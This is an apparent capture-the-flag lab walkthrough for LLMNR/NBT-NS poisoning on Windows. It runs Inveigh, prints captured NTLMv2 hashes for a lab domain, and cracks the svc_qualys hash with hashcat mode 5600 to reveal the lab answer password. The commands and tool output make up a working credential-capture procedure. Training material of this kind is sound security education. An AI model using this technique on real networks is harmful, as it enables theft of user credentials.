
LLMNR/NBT-NS Poisoning - from Windows

ℹ️ Information

Question

Run Inveigh and capture the NTLMv2 hash for the svc_qualys account. Crack and submit the cleartext password as the answer.

📋 Walkthrough

We log in via RDP and start Inveigh from the C:\Tools directory. The walkthrough uses the compiled Inveigh.exe rather than importing the Inveigh.ps1 module; either way, run it from a PowerShell session started as administrator, since the packet sniffer needs elevated privileges.

PS C:\Tools> .\Inveigh.exe
[*] Inveigh 2.0.4 [Started 2025-03-30T12:48:36 | PID 4216]
[+] Packet Sniffer Addresses [IP 172.16.5.25 | IPv6 fe80::10e9:773c:4d60:b530%8]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 172.16.5.25 | IPv6 fe80::10e9:773c:4d60:b530%8]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[ ] DHCPv6
[+] DNS Packet Sniffer [Type A]
[ ] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[ ] MDNS
[ ] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[ ] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[ ] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\Tools]
[+] Previous Session Files [Imported]
[*] Press ESC to enter/exit interactive console

Note that NBNS shows as disabled in the startup output ([ ] NBNS), so this run only spoofs LLMNR and DNS queries and relies on the HTTP, WebDAV and SMB listeners/sniffers to collect the authentication attempts that follow; that is enough for this exercise. After letting Inveigh run for a while, press ESC to enter the interactive console and list the captured hashes with the GET NTLMV2UNIQUE command.

================================================= Unique NTLMv2 Hashes =================================================

Hashes
========================================================================================================================
lab_adm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
backupagent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
svc_qualys::INLANEFREIGHT:053BD75E82885D85:5804D6E32161FB502A9872CF3F741321:0101000000000000D58E3BCEACA1DB01F90DC91AE161A9BF0000000002001A0049004E004C0041004E004500460052004500490047004800540001001E00410043004100440045004D0059002D00450041002D004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0003004600410043004100440045004D0059002D00450041002D004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0007000800D58E3BCEACA1DB0106000400020000000800300030000000000000000000000000300000C9FA807377F66C4994EB4116071C6456E287BD34BBA0D8FDBD67D025208998F10A001000000000000000000000000000000000000900200063006900660073002F003100370032002E00310036002E0035002E00320035000000000000000000
forend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

Copy the svc_qualys line into a file (named hash here) on the attack box and crack it with hashcat in mode 5600 (NetNTLMv2) against rockyou.txt. hashcat prints the username in uppercase because that is how the NTLMv2 identity is computed; the domain and the hex fields are otherwise unchanged.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

[...]

SVC_QUALYS::INLANEFREIGHT:053bd75e82885d85:5804d6e32161fb502a9872cf3f741321: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security#1

[...]

Answer

security#1